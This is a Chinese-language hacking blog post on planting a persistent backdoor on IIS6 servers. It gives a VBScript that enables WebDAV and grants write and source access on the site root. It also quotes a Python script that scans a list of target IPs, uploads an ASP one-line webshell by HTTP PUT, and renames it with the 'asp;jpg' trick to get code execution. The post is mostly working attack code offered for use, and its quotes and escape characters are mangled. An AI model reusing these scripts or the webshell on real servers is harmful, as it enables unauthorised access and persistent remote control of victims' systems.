IIS一种鲜为人知的留后门方式

 Ps:此文纯属闲得蛋疼,不过个人觉得最好的方式第一是逻辑,第二就是制造一些只有你能利用而别人即使发现了也无法利用的漏洞.

//=============================================================================
今天记录的就是人为制造WebDAV验证上传的洞洞，也就是俗称的“IIS写权限的利用”.
要将其作为“后门”来使用，我觉得应该符合我上面所说的两点中的后者，所以最好是选择一个爬虫或者一般的web相对路径爆破所难以抓到的路径，来开启Write权限，当然打开WebDAV扩展之后，提交Option的HTTP VERB是很容易知道你有PUT和MOVE权限的。而手动开启这些配置你可能需要打开IIS管理器，在GUI下操作，但是hacking当然是do all in shell最装13啦。所以不妨用vbs来实现整个过程。
 

for the IIS6

Option Explicit
Dim objIIsWebService
Set objIIsWebService = GetObject(“IIS://localhost/W3SVC”)
objIIsWebService.EnableWebServiceExtension “WEBDAV”
objIIsWebService.SetInfo

Dim objIIsWebSite
Set objIIsWebSite = GetObject(“IIS://localhost/W3SVC/1/ROOT”)
objIIsWebSite.AccessRead = True
objIIsWebSite.AccessSource = True
objIIsWebSite.AccessWrite = True
objIIsWebSite.EnableDirBrowsing = True
objIIsWebSite.SetInfo

这里需要解释的ADSI方式操作中 IIS://ComputerName/Service/Website/Directory 这种形式所表示的路径，其中website可以通过IIS管理器的identifier来获得，或者使用注入IISSPY这里小脚本，或者使用IIS自带vbs脚本来获得。如默认站点的绝对路径为 C:inetpubwwwroot ===> IIS://localhost/W3SVC/1/ROOT 则其根目录下的darkray路径对应为 IIS://localhost/W3SVC/1/ROOT/darkay.事实上你可以构造一个比较完美的脚本，建立一个非默认路径的映射比如放到D:reycler下等，更多可以参考《使用脚本对IIS进行深入管理》& http://blog.sina.com.cn/s/blog_9840bb7f0100xyxl.html。

剩下就是利用了，可以用老兵前辈的IISPUT小工具来弄，或者burp发包，再或者curl在shell展示下酷炫，这里引用一下写好的py脚本

http://www.subhashdasyam.com/2011/04/python-iis-scanner-with-auto-uploading.html

#!/usr/bin/python
import socket,re,urllib,urllib2,os,sys
def options():
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((t_IP,t_port))
req = “OPTIONS / HTTP/1.1rn”
req += “Host: ” + t_IP + “rn”
req += “Connection: closern”
req += “rnrn”
#print req
sock.send(req)
data = sock.recv(1024)
sock.close()
r1 = re.compile(‘DAV’)
result = r1.findall(data)
if result == []:
print “On bad…the web DAV is not open.n”
else:

print “WA HAHA LET US CHECK MORE time”
return None
def put():
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((t_IP,t_port))
text = ‘<%execute request("hacker")%>‘
print “File content:n” + text
file_length = len(text)
req = “PUT /” + ‘temp003.txt’ +” HTTP/1.1rn”
req += “Connection: closern”
req += “Host: ” + t_IP + “rn”
req += “Content-Type: text/xml; charset=’utf-8′rn”
req += “Content-Length: ” + str(file_length) +”rnrn”
req += text + “rn”
sock.send(req)
data = sock.recv(1024)
sock.close()
r2 = re.compile(‘OK’)
result = r2.findall(data)
if result == []:
print “On bad…the web is not wirrten.n”
else:

print “OK code uploaded”
print “ncode here ” + ‘http://’+t_IP+’/'+’temp003.txt’
def move():
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((t_IP,t_port))
req = “MOVE /” + ‘temp003.txt’ +” HTTP/1.1rn”
req += “Host: ” + t_IP + “rn”
req += “Destination: http://” + t_IP +’/'+ ‘temp003.;jpg’+”nn”

sock.send(req)
data = sock.recv(1024)
sock.close()
r3 = re.compile(‘asp’)
result = r3.findall(data)
if result == []:
print “On bad…the web is not wirrten.n”
else:
print “n_shell :D and check RESULT.TXT nhttp://” + t_IP +’/'+ ‘temp003.asp;jpg’+”nn”
temp=”http://” + t_IP +’/'+ ‘temp003.asp;jpg’
os.system(‘echo’+’ ‘+ temp +’ >>RESULT.txt’)


t_port = 80

print “===============Auto Upload Shell==================”
print “n[1] Check the Vulnerability”
#IP=raw_input(“enter your target ip like 1.1.1.0/24:”)
#inp = raw_input(“enter your choice:”)
#if inp == ’1′:
# options()
# if options() is None:
# put()
# move()
IP=raw_input(“enter your txt position like C:1.txt:”)
f=open(IP,’r')
lines=f.readlines()

#b = ‘nmap’+’ ‘+’–open ‘+”+’-p 80 ‘ + ” + IP
#print b +’rn’+'Now go for find the dork server’
#a = str(os.popen(b).readlines())
#r1 = re.compile(“d*.d*.d*.d*”)
#ip = r1.findall(a)
ips=[]
#if ip==[]:
# sys.exit()
for x in lines:
x=x.strip()
ips.append(x)

for y in ips:
t_IP = y

try:
print ‘now scan the ‘+y
options()
if options() is None:
put()
move()
except:
continue
print “Enjoy the Shell”

 

参考

http://www.zhishiwu.com/Article/201307/228165.

http://blogs.msdn.com/b/robert_mcmurray/archive/2008/03/04/enabling-webdav-on-iis-6.aspx